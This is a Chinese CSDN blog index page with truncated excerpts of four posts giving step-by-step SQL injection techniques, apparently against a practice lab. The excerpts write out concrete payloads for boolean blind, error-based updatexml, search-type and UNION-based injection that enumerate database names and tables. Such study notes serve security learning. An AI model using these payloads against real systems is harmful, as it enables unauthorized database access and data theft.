新时代的小菜b-CSDN博客

原创 SQL注入之常见注入的步骤④

SQL注入之常见注入的步骤④盲注：(布尔)①判断注入:name=kobe’ and 1=1 %23 正常， name=kobe’ and 1=2 报错存在注入②通过length判断数据库的长度name=kobe’ and length (database())>6 %23 正常，>7报错所以长度为7③判断数据库第一位的ascii值name=kobe’ and ascii(substr(database(),1,1))>111 正常 >112报错所以库的第一位asci

2020-11-11 15:30:19 226

原创 SQL注入之常见注入的步骤③

sql注入之常见注入的操作步骤insert/update 注入 (俩种方法注入相同)update注入 (在修改信息的时候，后台就是通过update去找操作的)insert注入(insert 注入是指我们前端注册的信息，后台就是通过insert这个操作插入到数据库中)①在注册信息处抓包②insert判断注入：单引号报错存在注入，报错信息为’1234’),‘1’1’1’1)③基于报错信息进行注入，构造payload爆数据库：1234’ or updatexml(1,concat(0x7e,(s

2020-11-11 14:43:38 289

原创 SQL注入之常见注入的步骤②

sql注入之常见注入的步骤②搜索型注入①判断注入： 1’ and 1=1 正确 and 1=2 报错②判断列数：1’ order by 3 %23 正确 1’ order by 4 报错③爆数据库：id=-1’ and updatexml(1,concat(select database()),1)%23④爆数据表：id=-1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where

2020-11-10 16:58:25 178

原创 SQL注入之常见注入的步骤①

SQL注入之常见的注入步骤(1)数字型注入第一步：抓包第二步：判断注入 id=1 and 1=1 正确 id=1 and1=2 报错第三步：判断列数 id=1 order by 3 报错 order by 2 正确（依此可以判断为2列）第四步：爆显示位：id=-1 union select 1,2 (可以爆出1或哪个是显示位)第五步：爆数据库：id=-1 union select 1,database() （在2列上爆数据库）第六步：爆数据表：id=-1 union select 1,t

2020-11-10 15:47:43 316

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人